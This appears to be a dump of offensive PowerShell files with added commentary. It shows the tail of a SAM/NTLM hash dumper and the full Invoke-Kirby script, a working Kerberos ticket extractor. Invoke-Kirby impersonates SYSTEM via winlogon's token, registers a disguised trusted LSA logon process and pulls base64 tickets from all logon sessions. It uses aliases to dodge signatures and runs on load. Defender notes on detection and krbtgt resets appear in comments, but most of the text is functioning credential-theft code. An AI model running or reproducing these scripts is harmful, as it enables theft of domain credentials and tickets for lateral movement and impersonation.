34 | $odd_parity=@(1,1,2,2,4,4,7,7,8,8,11,11,13,13,14,14,16,16,19,19,21,21,22,22,25,25,26,26,28,28,31,31,32,32,35,35,37,37,38,38,41,41,42,42,44,44,47,47,49,49,50,50,52,52,55,55,56,56,59,59,61,61,62,62,64,64,67,67,69,69,70,70,73,73,74,74,76,76,79,79,81,81,82,82,84,84,87,87,88,88,91,91,93,93,94,94,97,97,98,98,100,100,103,103,104,104,107,107,109,109,110,110,112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254);$0=@();$0+=bitshift $s[0]-1;$0+=(bitshift ($s[0]-band 0x01) 6)-bor(bitshift $s[1]-2);$0+=(bitshift ($s[1]-band 0x03) 5)-bor(bitshift $s[2]-3);$0+=(bitshift ($s[2]-band 0x07) 4)-bor(bitshift $s[3]-4);$0+=(bitshift ($s[3]-band 0x0F) 3)-bor(bitshift $s[4]-5);$0+=(bitshift ($s[4]-band 0x1F) 2)-bor(bitshift $s[5]-6);$0+=(bitshift ($s[5]-band 0x3F) 1)-bor(bitshift $s[6]-7);$0+=$s[6]-band 0x7F;$0[0]=$odd_parity[(bitshift $0[0] 1)];$0[1]=$odd_parity[(bitshift $0[1] 1)];$0[2]=$odd_parity[(bitshift $0[2] 1)];$0[3]=$odd_parity[(bitshift $0[3] 1)];$0[4]=$odd_parity[(bitshift $0[4] 1)];$0[5]=$odd_parity[(bitshift $0[5] 1)];$0[6]=$odd_parity[(bitshift $0[6] 1)];$0[7]=$odd_parity[(bitshift $0[7] 1)];$0}
# bitshift: shift by multiplying with 2^$c and flooring; a negative $c is a right shift. Returns a [double].
35 | function bitshift($x, $c){return [math]::Floor($x * [math]::Pow(2, $c))}
# Driver: collects GNLPH's objects under impersonation, drops the built-in Guest/DefaultAccount/
# WDAGUtilityAccount, and writes one line per account. The LM field is the constant
# aad3b435b51404eeaad3b435b51404ee (empty LM hash) — LM hashes are never read from the hive.
# $output and $Output are the same variable (PowerShell variable names are case-insensitive).
36 | $users=IAS -Process {GNLPH};$excludedUsernames=@("Guest","DefaultAccount","WDAGUtilityAccount");foreach($user in $users){if($user.Username-notin$excludedUsernames){$output="$($user.Username):$($user.RID):aad3b435b51404eeaad3b435b51404ee:$($user.NTLM.ToLower()):::";$Output}}}
# Executed on load: the script both defines and immediately runs DumpSAM.
37 | DumpSAM
38 | 
39 | 
40 | 
41 | 
# Lines 42-56 are the tail of a different function whose header is not in this listing (it splits $Data
# on whether the name contains "$" — presumably user vs. computer accounts — gated by -NoComputerHashes);
# left as found.
42 | $Data | ForEach-Object {
43 | if ($_ -notlike "*$*") {
44 | Write-Output $_
45 | }
46 | }
47 | 
48 | if (!$NoComputerHashes) {
49 | $Data | ForEach-Object {
50 | if ($_ -like "*$*") {
51 | Write-Output $_
52 | 
53 | }
54 | }
55 | }
56 | }
57 | --------------------------------------------------------------------------------
/Kirby.ps1:
--------------------------------------------------------------------------------
# --- Kirby.ps1 ---
# Invoke-Kirby: Kerberos ticket dumper built on the secur32 LSA authentication-package API. For every
# logon session it can reach it lists the ticket cache (KerbQueryTicketCacheExMessage) and retrieves each
# ticket in encoded form (KerbRetrieveEncodedTicketMessage), printed as base64 by DSC. Privilege model:
# RAA (local Administrators role or an NT AUTHORITY\* identity) decides whether all sessions are
# enumerated or only the caller's own; Get-lsah takes the trusted LsaRegisterLogonProcess route when IAS
# manages to impersonate winlogon (that call needs SeTcbPrivilege, which is why the impersonation exists)
# and LsaConnectUntrusted otherwise. The nO/aM/wO aliases and the $x="public" substitution inside the C#
# source presumably exist only to break static signatures.
# Defender notes: the ticket.dump and impsys.win32 types are compiled with Add-Type at run time (on
# Windows PowerShell 5.1 a csc.exe child of the script host); LsaRegisterLogonProcess is called from a
# non-LSA process under the name "User32LogonProcess"; and the query-cache-then-retrieve-encoded-ticket
# sequence against foreign LUIDs is the signature of ticket extraction. Tickets obtained this way stay
# valid until they expire, so an exposure is handled by resetting the affected principals (and krbtgt,
# twice, if a DC session was reachable), not by cleaning the host alone.
1 | Function Invoke-Kirby{
2 | Set-Alias nO New-Object
3 | Set-Alias aM Add-Member
4 | Set-Alias wO Write-Output
5 | $x="public"
6 | $sn="NT.AUT.*\\"
# IAS (Kirby variant): same winlogon-token impersonation as DumpSAM's IAS, used here as a probe — returns
# $true when the impersonated identity matches $sn (NT AUTHORITY\...). Unlike the DumpSAM version it never
# calls RevertToSelf, so on success the thread stays impersonated as SYSTEM for the rest of the run
# (presumably intentional, since Get-lsah then calls LsaRegisterLogonProcess). Handles are not closed.
7 | function IAS{$p=gps winlogon|select -f 1 -exp Id;if(($h=[impsys.win32]::OpenProcess(0x400,$true,[Int32]$p))-eq[IntPtr]::Zero){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$t=[IntPtr]::Zero;if(-not[impsys.win32]::OpenProcessToken($h,0x0E,[ref]$t)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$d=[IntPtr]::Zero;if(-not[impsys.win32]::DuplicateTokenEx($t,0x02000000,[IntPtr]::Zero,0x02,0x01,[ref]$d)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}try{if(-not[impsys.win32]::ImpersonateLoggedOnUser($d)){$e=[Runtime.InteropServices.Marshal]::GetLastWin32Error()}$c=$([System.Security.Principal.WindowsIdentity]::GetCurrent().Name);if($c-match $sn){return $true}else{return $false}}catch{return $false}return $false}
# LsaRegisterLogonProcess: trusted LSA connection registered as "User32LogonProcess" (presumably chosen to
# resemble a legitimate caller). On a non-zero status it writes the status to the pipeline and falls back
# to LsaConnectUntrusted. $dtk is assigned here and elsewhere but never read.
8 | Function LsaRegisterLogonProcess(){$LPN="User32LogonProcess";$LS=nO ticket.dump+LSA_STRING_IN;$lh=nO System.IntPtr;[System.UInt64]$SecurityMode=0;$LS.Length=[System.UInt16]$LPN.Length;$LS.MaximumLength=[System.UInt16]($LPN.Length+1);$LS.buffer=[System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($LPN);[int]$ret=[ticket.dump]::LsaRegisterLogonProcess($LS,[ref]$lh,[ref]$SecurityMode);if($ret-ne 0){$ret;$dtk=$false;return $(LsaConnectUntrusted)}return $lh}
# LsaConnectUntrusted: untrusted LSA connection; throws an empty-message exception on failure (the
# return -1 after the throw is unreachable).
9 | function LsaConnectUntrusted{$lh=nO System.IntPtr;[int]$ret=[ticket.dump]::LsaConnectUntrusted([ref]$lh);if($ret-ne 0){throw "";return -1}return $lh}
# Get-lsah: trusted handle when IAS succeeded (SYSTEM), untrusted handle otherwise.
10 | Function Get-lsah(){$lh=nO System.IntPtr;$sysres=IAS;if($sysres){$dtk=$true;return $(LsaRegisterLogonProcess)}else{$dtk=$false;return $(LsaConnectUntrusted)}}
# GetLogonSessionData: LsaGetLogonSessionData for one LUID, marshalled into a managed LogonSessionData
# (the LSA strings are UTF-16, hence Length/2). The finally block frees $luidptr with LsaFreeReturnBuffer
# although it came from AllocHGlobal — a mismatched allocator pair. Returns $LSD; when the call failed
# $LSD was never assigned, so the caller gets $null — which is why main wraps the call in try/catch and
# skips the session.
11 | Function GetLogonSessionData($luid){$luidptr=nO System.IntPtr;$sessionDataPtr=nO System.IntPtr;try{$luidptr=[System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf($luid));[System.Runtime.InteropServices.Marshal]::StructureToPtr($luid,$luidptr,$false);$ret=[ticket.dump]::LsaGetLogonSessionData($luidptr,[ref]$sessionDataPtr);if($ret-eq 0){$type=nO ticket.dump+SECURITY_LOGON_SESSION_DATA;$type=$type.GetType();[ticket.dump+SECURITY_LOGON_SESSION_DATA]$unsafeData=[System.Runtime.InteropServices.Marshal]::PtrToStructure($sessionDataPtr,[type]$type);$LSD=nO ticket.dump+LogonSessionData;$LSD.AuthenticationPackage=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($unsafeData.AuthenticationPackage.Buffer,$unsafeData.AuthenticationPackage.Length/2);$LSD.DnsDomainName=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($unsafeData.DnsDomainName.Buffer,$unsafeData.DnsDomainName.Length/2);$LSD.LogonID=$unsafeData.LogonID;$LSD.LogonTime=[System.DateTime]::FromFileTime($unsafeData.LogonTime);$LSD.LogonServer=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($unsafeData.LogonServer.Buffer,$unsafeData.LogonServer.Length/2);[ticket.dump+LogonType]$LSD.LogonType=$unsafeData.LogonType;$LSD.Sid=nO System.Security.Principal.SecurityIdentifier($unsafeData.PSid);$LSD.Upn=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($unsafeData.Upn.Buffer,$unsafeData.Upn.Length/2);$LSD.Session=[int]$unsafeData.Session;$LSD.username=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($unsafeData.username.Buffer,$unsafeData.username.Length/2);$LSD.LogonDomain=[System.Runtime.InteropServices.Marshal]::PtrToStringUni($unsafeData.LogonDomain.buffer,$unsafeData.LogonDomain.Length/2)}}finally{if($sessionDataPtr-ne[System.IntPtr]::Zero){[ticket.dump]::LsaFreeReturnBuffer($sessionDataPtr)>$null}if($luidptr-ne[System.IntPtr]::Zero){[ticket.dump]::LsaFreeReturnBuffer($luidptr)>$null}}return $LSD}
# GCL: current logon LUID scraped from the second line of klist's text output — depends on klist's exact
# layout and UI language.
12 | Function GCL(){$o=klist;return $o.split("`n")[1].split(":")[1]}
# RAA: $true when the caller is in the local Administrators role or its identity name matches $sn.
13 | Function RAA(){$user=[System.Security.Principal.WindowsIdentity]::GetCurrent();$princ=nO System.Security.Principal.WindowsPrincipal($user);return $princ.IsInRole("Administrators") -or $user.Name -match $sn}
# ET: single KerbRetrieveEncodedTicketMessage call for target $t in session $u (CacheOptions 0x8, i.e.
# return the ticket as a KERB_CRED). The request struct is marshalled into one unmanaged buffer with the
# UTF-16 target name copied right after it, and WriteIntPtr at offset 24 (x64) / 16 (x86) patches
# TargetName.Buffer to that in-buffer copy (the submit buffer is copied into lsass, so pointers inside it
# must point into the buffer itself). Returns a PSObject {success, Ticket (base64), SessionKeyType};
# success flips to $false if no ticket came back. LsaFreeReturnBuffer($r) runs unconditionally, also when
# $rc failed and $r is still zero, and the $n.buffer string allocation is never freed. The $f and $tk
# parameters are unused.
14 | Function ET([intptr]$l,[int]$a,[ticket.dump+LUID]$u=(nO ticket.dump+LUID),[string]$t,[System.UInt32]$f=0,$tk){$r=[System.IntPtr]::Zero;$q=nO ticket.dump+KERB_RETRIEVE_TKT_REQUEST;$qType=$q.GetType();$s=nO ticket.dump+KERB_RETRIEVE_TKT_RESPONSE;$sType=$s.GetType();$e=0;$v=0;$q.MessageType=[ticket.dump+KERB_PROTOCOL_MESSAGE_TYPE]::KerbRetrieveEncodedTicketMessage;$q.LogonId=$u;$q.TicketFlags=0x0;$q.CacheOptions=0x8;$q.EncryptionType=0x0;$n=nO ticket.dump+UNICODE_STRING;$n.Length=[System.UInt16]($t.Length*2);$n.MaximumLength=[System.UInt16](($n.Length)+2);$n.buffer=[System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($t);$q.TargetName=$n;$z=[System.Runtime.InteropServices.Marshal]::SizeOf([type]$qType);$x=$z+$n.MaximumLength;$y=[System.Runtime.InteropServices.Marshal]::AllocHGlobal($x);[System.Runtime.InteropServices.Marshal]::StructureToPtr($q,$y,$false);$w=[System.IntPtr]([System.Int64]($y.ToInt64()+[System.Int64]$z));[ticket.dump]::CopyMemory($w,$n.buffer,$n.MaximumLength);if([System.IntPtr]::Size -eq 8){$size=24}else{$size=16}[System.Runtime.InteropServices.Marshal]::WriteIntPtr($y,$size,$w);$rc=[ticket.dump]::LsaCallAuthenticationPackage($l,$a,$y,$x,[ref]$r,[ref]$e,[ref]$v);if(($rc-eq 0)-and($e -ne 0)){$s=[System.Runtime.InteropServices.Marshal]::PtrToStructure($r,[type]$sType);$encodedTicketSize=$s.Ticket.EncodedTicketSize;$encodedTicket=[System.Array]::CreateInstance([byte],$encodedTicketSize);[System.Runtime.InteropServices.Marshal]::Copy($s.Ticket.EncodedTicket,$encodedTicket,0,$encodedTicketSize)}[ticket.dump]::LsaFreeReturnBuffer($r);[System.Runtime.InteropServices.Marshal]::FreeHGlobal($y);$tobj=nO psobject;$tobj|aM -Type NoteProperty -Name "success" -Value $true;try{$tobj|aM -Type NoteProperty -Name "Ticket" -Value $([Convert]::ToBase64String($encodedTicket));$tobj|aM -Type NoteProperty -Name "SessionKeyType" -Value $s.Ticket.SessionKey.KeyType}catch{$tobj.success=$false}return $tobj}
# EnumerateLogonSessions: every LUID from LsaEnumerateLogonSessions when RAA, otherwise only the current
# one (from GCL, low part only). Note $luidptr is advanced inside the loop and the advanced pointer is
# what gets passed to LsaFreeReturnBuffer, so the original allocation is not the one freed.
15 | Function EnumerateLogonSessions(){$luids=@();if(!(RAA)){$strLuid=GCL;$intLuid=[convert]::ToInt32($strluid,16);$luid=nO ticket.dump+LUID;$luid.LowPart=$intLuid;$luids+=$luid;}else{$count=nO System.Int32;$luidptr=nO System.IntPtr;$ret=[ticket.dump]::LsaEnumerateLogonSessions([ref]$count,[ref]$luidptr);if($ret -ne 0){$ret}else{$Luidtype=nO ticket.dump+LUID;$Luidtype=$Luidtype.GetType();for($i=0;$i -lt[int32]$count;$i++){$luid=[System.Runtime.InteropServices.Marshal]::PtrToStructure($luidptr,[type]$Luidtype);$luids+=$luid;[System.IntPtr]$luidptr=$luidptr.ToInt64()+[System.Runtime.InteropServices.Marshal]::SizeOf([type]$Luidtype);}[ticket.dump]::LsaFreeReturnBuffer($luidptr)}}return $luids}
# DSC: prints each session's tickets (skipping empty sets and LUID 0). Both arms of the krbtgt conditional
# produce the identical "Service Name" line, so that if/else is dead.
16 | Function DSC($scs){foreach($sc in $scs){if($sc.Ticketb64 -ne $null-and(@($sc).Count -gt 0)-and($sc[0].LogonSession[0].LogonID.LowPart -ne "0")){foreach($tk in $sc){$si=if($tk.ServerName -like "*krbtgt*"){"Service Name : {0}"-f $tk.ServerName}else{"Service Name : {0}"-f $tk.ServerName}wO $si;wO ("EncryptionType : {0}"-f ([ticket.dump+EncTypes]$tk.EncryptionType));wO ("Ticket Exp : {0}"-f $tk.EndTime);wO ("Server Name : {0}@{1}"-f ($tk.ServerName -split "/")[1],$tk.ServerRealm);wO ("UserName : {0}@{1}" -f $tk.ClientName, $tk.ClientRealm);wO ("Flags : {0}"-f $tk.TicketFlags);if($tk.SessionKeyType){wO ("Session Key Type : {0}`n"-f $tk.SessionKeyType)}wO "-[Ticket]-`n";wO $tk.Ticketb64;wO ""}}}}
# main: compiles the ticket.dump P/Invoke layer from the here-string below ($x expands to "public" inside
# it), compiles impsys.win32 if absent, looks up the "kerberos" package, then for every logon session
# queries the cache and retrieves each ticket via ET before handing the collection to DSC.
17 | function main{$tickdotnet = @"
18 | [StructLayout(LayoutKind.Sequential)]$x struct LUID{$x UInt32 LowPart;$x Int32 HighPart;}[DllImport("secur32.dll",SetLastError=false)]$x static extern int LsaConnectUntrusted([Out]out IntPtr LsaHandle);[StructLayout(LayoutKind.Sequential)]$x struct LSA_STRING_IN{$x ushort Length;$x ushort MaximumLength;$x IntPtr buffer;}[DllImport("secur32.dll",SetLastError=true)]$x static extern int LsaRegisterLogonProcess(LSA_STRING_IN LogonProcessName,out IntPtr LsaHandle,out ulong SecurityMode);[DllImport("secur32.dll",SetLastError=false)]$x static extern int LsaLookupAuthenticationPackage([In]IntPtr LsaHandle,[In]ref LSA_STRING_IN PackageName,[Out]out UInt32 AuthenticationPackage);[DllImport("Secur32.dll",SetLastError=false)]$x static extern int LsaEnumerateLogonSessions(out uint LogonSessionCount,out IntPtr LogonSessionList);[DllImport("secur32.dll",SetLastError=false)]$x static extern int LsaFreeReturnBuffer([In]IntPtr buffer);$x enum LogonType{UndefinedLogonType,Interactive,Network,Batch,Service,Proxy,Unlock,NetworkCleartext,NewCredentials,RemoteInteractive,CachedInteractive,CachedRemoteInteractive,CachedUnlock}$x class LogonSessionData{$x LUID LogonID;$x string username;$x string LogonDomain;$x string AuthenticationPackage;$x LogonType logonType;$x int Session;$x SecurityIdentifier Sid;$x DateTime LogonTime;$x string LogonServer;$x string DnsDomainName;$x string Upn;}$x struct SECURITY_LOGON_SESSION_DATA{$x UInt32 size;$x LUID LogonID;$x LSA_STRING_IN username;$x LSA_STRING_IN LogonDomain;$x LSA_STRING_IN AuthenticationPackage;$x UInt32 logontype;$x UInt32 Session;$x IntPtr PSid;$x UInt64 LogonTime;$x LSA_STRING_IN LogonServer;$x LSA_STRING_IN DnsDomainName;$x LSA_STRING_IN Upn;}[DllImport("Secur32.dll",SetLastError=false)]$x static extern uint LsaGetLogonSessionData(IntPtr luid,out IntPtr ppLogonSessionData);$x enum KERB_PROTOCOL_MESSAGE_TYPE{KerbDebugRequestMessage,KerbQueryTicketCacheMessage,KerbChangeMachinePasswordMessage,KerbVerifyPacMessage,KerbRetrieveTicketMessage,KerbUpdateAddressesMessage,KerbPurgeTicketCacheMessage,KerbChangePasswordMessage,KerbRetrieveEncodedTicketMessage,KerbDecryptDataMessage,KerbAddBindingCacheEntryMessage,KerbSetPasswordMessage,KerbSetPasswordExMessage,KerbVerifyCredentialMessage,KerbQueryTicketCacheExMessage,KerbPurgeTicketCacheExMessage,KerbRefreshSmartcardCredentialsMessage,KerbAddExtraCredentialsMessage,KerbQuerySupplementalCredentialsMessage,KerbTransferCredentialsMessage,KerbQueryTicketCacheEx2Message,KerbSubmitTicketMessage,KerbAddExtraCredentialsExMessage}[StructLayout(LayoutKind.Sequential)]$x struct KERB_QUERY_TKT_CACHE_REQUEST{$x KERB_PROTOCOL_MESSAGE_TYPE MessageType;$x LUID LogonId;}[StructLayout(LayoutKind.Sequential)]$x struct UNICODE_STRING{$x ushort Length;$x ushort MaximumLength;$x IntPtr Buffer;}[StructLayout(LayoutKind.Sequential)]$x struct KERB_TICKET_CACHE_INFO_EX{$x UNICODE_STRING ClientName;$x UNICODE_STRING ClientRealm;$x UNICODE_STRING ServerName;$x UNICODE_STRING ServerRealm;$x long StartTime;$x long EndTime;$x long RenewTime;$x uint EncryptionType;$x uint TicketFlags;}[Flags]$x enum TicketFlags:uint{name_canonicalize=0x10000,forwardable=0x40000000,forwarded=0x20000000,hw_authent=0x00100000,initial=0x00400000,invalid=0x01000000,may_postdate=0x04000000,ok_as_delegate=0x00040000,postdated=0x02000000,pre_authent=0x00200000,proxiable=0x10000000,proxy=0x08000000,renewable=0x00800000,reserved=0x80000000,reserved1=0x00000001}$x enum EncTypes:uint{DES_CBC_CRC=0x0001,DES_CBC_MD4=0x0002,DES_CBC_MD5=0x0003,DES_CBC_raw=0x0004,DES3_CBC_raw=0x0006,DES3_CBC_SHA_1=0x0010,AES128_CTS_HMAC_SHA1_96=0x0011,AES256_CTS_HMAC_SHA1_96=0x0012,AES128_cts_hmac_sha256_128=0x0013,AES256_cts_hmac_sha384_192=0x0014,RC4_HMAC_MD5=0x0017,RC4_HMAC_MD5_EXP=0x0018}[StructLayout(LayoutKind.Sequential)]$x struct KERB_QUERY_TKT_CACHE_RESPONSE{$x KERB_PROTOCOL_MESSAGE_TYPE MessageType;$x int CountOfTickets;$x IntPtr Tickets;}[StructLayout(LayoutKind.Sequential)]$x struct SECURITY_HANDLE{$x IntPtr LowPart;$x IntPtr HighPart;}[StructLayout(LayoutKind.Sequential)]$x struct KERB_RETRIEVE_TKT_REQUEST{$x KERB_PROTOCOL_MESSAGE_TYPE MessageType;$x LUID LogonId;$x UNICODE_STRING TargetName;$x uint TicketFlags;$x uint CacheOptions;$x int EncryptionType;$x SECURITY_HANDLE CredentialsHandle;}[StructLayout(LayoutKind.Sequential)]$x struct KERB_CRYPTO_KEY{$x int KeyType;$x int Length;$x IntPtr Value;}[StructLayout(LayoutKind.Sequential)]$x struct KERB_EXTERNAL_TICKET{$x IntPtr ServiceName;$x IntPtr TargetName;$x IntPtr ClientName;$x UNICODE_STRING DomainName;$x UNICODE_STRING TargetDomainName;$x UNICODE_STRING AltTargetDomainName;$x KERB_CRYPTO_KEY SessionKey;$x uint TicketFlags;$x uint Flags;$x long KeyExpirationTime;$x long StartTime;$x long EndTime;$x long RenewUntil;$x long TimeSkew;$x int EncodedTicketSize;$x IntPtr EncodedTicket;}[StructLayout(LayoutKind.Sequential)]$x struct KERB_RETRIEVE_TKT_RESPONSE{$x KERB_EXTERNAL_TICKET Ticket;}[DllImport("Secur32.dll",SetLastError=true)]$x static extern int LsaCallAuthenticationPackage(IntPtr LsaHandle,uint AuthenticationPackage,IntPtr ProtocolSubmitBuffer,int SubmitBufferLength,out IntPtr ProtocolReturnBuffer,out ulong ReturnBufferLength,out int ProtocolStatus);[DllImport("secur32.dll",SetLastError=false)]$x static extern int LsaDeregisterLogonProcess([In]IntPtr LsaHandle);[DllImport("kernel32.dll",EntryPoint="CopyMemory",SetLastError=false)]$x static extern void CopyMemory(IntPtr dest,IntPtr src,uint count);
19 | "@
20 | $tickasm=[System.Reflection.Assembly]::LoadWithPartialName("System.Security.Principal");Add-Type -MemberDefinition $tickdotnet -Namespace "ticket" -Name "dump" -ReferencedAssemblies $tickasm.location -UsingNamespace System.Security.Principal;try{& {$ErrorActionPreference='Stop';[void][impsys.win32]}}catch{
21 | Add-Type -TypeDefinition @"
22 | using System;using System.Runtime.InteropServices;namespace impsys{$x class win32{[DllImport("kernel32.dll", SetLastError=true)]$x static extern bool CloseHandle(IntPtr hHandle);[DllImport("kernel32.dll", SetLastError=true)]$x static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processId);[DllImport("advapi32.dll", SetLastError=true)]$x static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);[DllImport("advapi32.dll", SetLastError=true)]$x static extern bool DuplicateTokenEx(IntPtr hExistingToken, uint dwDesiredAccess, IntPtr lpTokenAttributes, uint ImpersonationLevel, uint TokenType, out IntPtr phNewToken);[DllImport("advapi32.dll", SetLastError=true)]$x static extern bool ImpersonateLoggedOnUser(IntPtr hToken);[DllImport("advapi32.dll", SetLastError=true)]$x static extern bool RevertToSelf();}}
23 | "@}
# Cache walk: KERB_TICKET_CACHE_INFO_EX entries start 8 bytes into the KERB_QUERY_TKT_CACHE_RESPONSE
# buffer; each becomes a PSObject and ET fetches its encoded ticket. Non-admin callers send a zero LUID
# (current session). $scs is never initialised before +=; it relies on $null + array yielding the array.
# There is no try/finally, so LsaDeregisterLogonProcess is skipped if an exception escapes the loop.
24 | $authpckg = nO System.Int32;$rc = nO System.Int32;$krbname = "kerberos";$LS = nO ticket.dump+LSA_STRING_IN;$LS.Length = [uint16]$krbname.Length;$LS.MaximumLength = [uint16]($krbname.Length + 1);$LS.buffer = [System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi($krbname);$lh = Get-lsah;$retcode = [ticket.dump]::LsaLookupAuthenticationPackage($lh,[ref]$LS,[ref]$authpckg);if ($retcode -ne 0){return -1}foreach($luid in EnumerateLogonSessions){if ($([System.Convert]::ToString($luid.LowPart,16) -eq 0x0)){continue;} else{$LSD = nO ticket.dump+LogonSessionData;try {$LSD = GetLogonSessionData($luid)} catch{continue}$sc = @();$tksPointer = nO System.IntPtr;$returnBufferLength = 0;$protocolStatus = 0;$tkCacheRequest = nO ticket.dump+KERB_QUERY_TKT_CACHE_REQUEST;$tkCacheRespone = nO ticket.dump+KERB_QUERY_TKT_CACHE_RESPONSE;$tkCacheResponeType = $tkCacheRespone.GetType();$tcr = nO ticket.dump+KERB_TICKET_CACHE_INFO_EX;$tkCacheRequest.MessageType = [ticket.dump+KERB_PROTOCOL_MESSAGE_TYPE]::KerbQueryTicketCacheExMessage;if(RAA){$tkCacheRequest.LogonId = $LSD.LogonID}else{$tkCacheRequest.LogonId = nO ticket.dump+LUID}$tQueryPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.Runtime.InteropServices.Marshal]::SizeOf($tkCacheRequest));[System.Runtime.InteropServices.Marshal]::StructureToPtr($tkCacheRequest,$tQueryPtr,$false);$retcode = [ticket.dump]::LsaCallAuthenticationPackage($lh,$authpckg,$tQueryPtr,[System.Runtime.InteropServices.Marshal]::SizeOf($tkCacheRequest),[ref]$tksPointer,[ref]$returnBufferLength,[ref]$protocolStatus);if(($retcode -eq 0) -and ($tksPointer -ne [System.IntPtr]::Zero)){[ticket.dump+KERB_QUERY_TKT_CACHE_RESPONSE]$tkCacheRespone = [System.Runtime.InteropServices.Marshal]::PtrToStructure($tksPointer,[type]$tkCacheResponeType);$count2 = $tkCacheRespone.CountOfTickets;if($count2 -ne 0){$cacheInfoType = $tcr.GetType();$dataSize = [System.Runtime.InteropServices.Marshal]::SizeOf([type]$cacheInfoType);for($j = 0;$j -lt $count2;$j++){[System.IntPtr]$currTicketPtr = [int64]($tksPointer.ToInt64() + [int](8 + $j * $dataSize));[ticket.dump+KERB_TICKET_CACHE_INFO_EX]$tcr = [System.Runtime.InteropServices.Marshal]::PtrToStructure($currTicketPtr,[type]$cacheInfoType);$tk = nO psobject;Add-Member -InputObject $tk -MemberType NoteProperty -name "StartTime" -value ([datetime]::FromFileTime($tcr.StartTime));Add-Member -InputObject $tk -MemberType NoteProperty -name "EndTime" -value ([datetime]::FromFileTime($tcr.EndTime));Add-Member -InputObject $tk -MemberType NoteProperty -name "RenewTime" -value ([datetime]::FromFileTime($tcr.RenewTime));Add-Member -InputObject $tk -MemberType NoteProperty -Name "TicketFlags" -Value ([ticket.dump+TicketFlags]$tcr.TicketFlags);Add-Member -InputObject $tk -MemberType NoteProperty -Name "EncryptionType" -Value $tcr.EncryptionType;Add-Member -InputObject $tk -MemberType NoteProperty -name "ServerName" -value ([System.Runtime.InteropServices.Marshal]::PtrToStringUni($tcr.ServerName.Buffer,$tcr.ServerName.Length / 2));Add-Member -InputObject $tk -MemberType NoteProperty -name "ServerRealm" -value ([System.Runtime.InteropServices.Marshal]::PtrToStringUni($tcr.ServerRealm.Buffer,$tcr.ServerRealm.Length / 2));Add-Member -InputObject $tk -MemberType NoteProperty -name "ClientName" -value ([System.Runtime.InteropServices.Marshal]::PtrToStringUni($tcr.ClientName.Buffer,$tcr.ClientName.Length / 2));Add-Member -InputObject $tk -MemberType NoteProperty -name "ClientRealm" -value ([System.Runtime.InteropServices.Marshal]::PtrToStringUni($tcr.ClientRealm.Buffer,$tcr.ClientRealm.Length / 2));Add-Member -InputObject $tk -MemberType NoteProperty -Name "LogonSession" -Value $LSD;$InfoObj = (ET $lh $authpckg $tkCacheRequest.LogonId $tk.ServerName $tcr.TicketFlags $tk);if ($Info
Obj.success -eq $true){$SessionEncType = $InfoObj.SessionKeyType;$tkb64 = $InfoObj.Ticket;Add-Member -InputObject $tk -MemberType NoteProperty -Name "Ticketb64" -Value $tkb64;try{if($SessionEncType -ne 0 ){Add-Member -InputObject $tk -MemberType NoteProperty -Name "SessionKeyType" -Value ([ticket.dump+EncTypes]$SessionEncType)};}catch{}} else{}$sc += $tk;}}}[ticket.dump]::LsaFreeReturnBuffer($tksPointer)|Out-Null;[System.Runtime.InteropServices.Marshal]::FreeHGlobal($tQueryPtr);$scs += @(,$sc)}}[ticket.dump]::LsaDeregisterLogonProcess($lh)|Out-Null;DSC $scs}$dtk = $false;main}
# Executed on load.
25 | Invoke-Kirby
26 | --------------------------------------------------------------------------------